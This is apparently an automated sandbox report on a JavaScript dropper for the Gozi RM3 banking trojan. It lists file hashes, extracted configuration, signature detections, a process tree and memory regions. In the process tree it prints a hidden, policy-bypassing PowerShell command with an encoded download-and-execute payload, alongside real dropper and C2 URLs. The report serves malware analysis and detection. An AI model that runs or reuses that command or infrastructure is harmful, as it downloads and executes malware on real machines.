Analysis

  • max time kernel
    150s
  • max time network
    201s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    03-09-2021 15:36

General

  • Target

    2217.js

  • Size

    278KB

  • MD5

    ed8988f1433e30276b87384f16825116

  • SHA1

    10c3b841313d765e380460506d5e760b2423680a

  • SHA256

    90663d341cc9a6e9d33df216882beea6dd451ab6a16e57f73392683018309b82

  • SHA512

    aae697ea7ebe642a21a7e6670d1d5d0c761f85e2a9fada7f27d0f67f1ee1b4deec63cb316111302c3dbaf53dc12a75eb369bbdcae67d08af853a8c859d41482e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://quickdrive.ae/js/JS000082510952000/dll/assistant.php

Extracted

Family

gozi_rm3

Attributes
  • build

    300981

Extracted

Family

gozi_rm3

Botnet

202108021

C2

https://hotroad.cyou

Attributes
  • build

    300981

  • exe_type

    loader

  • non_target_locale

    RU

  • server_id

    12

  • url_path

    index.htm

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\2217.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBxAHUAaQBjAGsAZAByAGkAdgBlAC4AYQBlAC8AagBzAC8ASgBTADAAMAAwADAAOAAyADUAMQAwADkANQAyADAAMAAwAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBxAHUAaQBjAGsAZAByAGkAdgBlAC4AYQBlAC8AagBzAC8ASgBTADAAMAAwADAAOAAyADUAMQAwADkANQAyADAAMAAwAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Users\Admin\AppData\Local\Temp\TnfuYI.exe
          "C:\Users\Admin\AppData\Local\Temp\TnfuYI.exe"
          4⤵
          • Executes dropped EXE
          PID:1760
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1680 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1692
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1608
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1772
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1044 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1664

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1652-64-0x00000000024B0000-0x00000000024B1000-memory.dmp

    Filesize

    4KB

  • memory/1652-69-0x0000000002590000-0x0000000002591000-memory.dmp

    Filesize

    4KB

  • memory/1652-68-0x000000001C3B0000-0x000000001C3B1000-memory.dmp

    Filesize

    4KB

  • memory/1652-67-0x00000000023A0000-0x00000000023A1000-memory.dmp

    Filesize

    4KB

  • memory/1652-66-0x000000001ADB4000-0x000000001ADB6000-memory.dmp

    Filesize

    8KB

  • memory/1652-65-0x000000001ADB0000-0x000000001ADB2000-memory.dmp

    Filesize

    8KB

  • memory/1652-63-0x000000001AE30000-0x000000001AE31000-memory.dmp

    Filesize

    4KB

  • memory/1652-62-0x00000000022D0000-0x00000000022D1000-memory.dmp

    Filesize

    4KB

  • memory/1652-61-0x000007FEFB761000-0x000007FEFB763000-memory.dmp

    Filesize

    8KB

  • memory/1760-72-0x0000000000DF0000-0x0000000000DFF000-memory.dmp

    Filesize

    60KB

  • memory/1760-80-0x00000000002C0000-0x00000000002C2000-memory.dmp

    Filesize

    8KB

  • memory/1760-78-0x0000000000090000-0x0000000000091000-memory.dmp

    Filesize

    4KB

  • memory/1760-75-0x00000000000A0000-0x00000000000B0000-memory.dmp

    Filesize

    64KB

  • memory/1760-74-0x0000000075AD1000-0x0000000075AD3000-memory.dmp

    Filesize

    8KB

  • memory/1760-73-0x0000000000DF0000-0x0000000000F3B000-memory.dmp

    Filesize

    1.3MB